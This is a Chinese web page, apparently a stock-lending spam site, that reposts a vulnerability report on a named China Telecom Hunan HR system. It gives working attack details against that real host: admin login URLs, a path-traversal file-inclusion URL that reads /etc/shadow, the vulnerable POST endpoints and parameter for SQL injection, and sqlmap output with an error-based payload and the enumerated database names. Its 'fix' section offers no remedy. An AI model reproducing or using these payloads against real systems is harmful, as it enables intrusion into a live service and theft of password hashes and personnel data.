关闭

当前位置:首页 > 场外配资 » 正文

「网上怎么买股票」中国电信某站SQL注入+文件包含漏洞

中国电信某站SQL注入+文件包含漏洞

后台一:https://rs.hntelecom.net.cn/HRSystem/initIndex.do

后台二:https://rs.hntelecom.net.cn/loginadmin.do?m=login

漏洞类型一:

文件包含:rs.hntelecom.net.cn/filedown.do?m=filedown&path=http://www.2cto.com/../..//../..//../..//../..//../..//etc/shadow%00

 

「网上怎么买股票」中国电信某站SQL注入+文件包含漏洞

看到没有,root权限的哦

漏洞类型二:

地址:rs.hntelecom.net.cn/search.do?m=search

post数据:sss=test&Submit=%cb%d1%20%cb%f7&ttt=test

地址:rs.hntelecom.net.cn/searchD.do?m=searchD

post数据:sss=test&Submit=%cb%d1%20%cb%f7&ttt=test

话说2个地址都是一样功能,搞出2个有意思吗
 

sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: POST Parameter: ttt Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: sss=1&Submit=�� ��&ttt=1' AND (SELECT 7373 FROM(SELECT COUNT(*),CONCAT(CHAR(58,114,108,100,58),(SELECT (CASE WHEN (7373=7373) THEN 1 ELSE 0 END)),CHAR(58,111,112,99,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'JyFl'='JyFl --- available databases [4]: [*] information_schema [*] manpower [*] test [*] yiqilaifinddifferences
修复方案:

不继续深入,存在进一步渗透风险。

 

上一篇:「本财配资」汽车的互联时代 我们还要等多久
下一篇:「股票配资」国际工程承包合同(样式二)
说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!

猜你喜欢


「如何网上炒股」万亿场

「如何网上炒股」万亿场外配资惊魂

2015年的股灾绕不开场外配资。2015年4月,在证监会第二次处罚券商两融违规时,一位券商高层向《中国经营报》记者提及,两融并不是处罚重点。最应该注意的其实是向其客户融资提...

二维码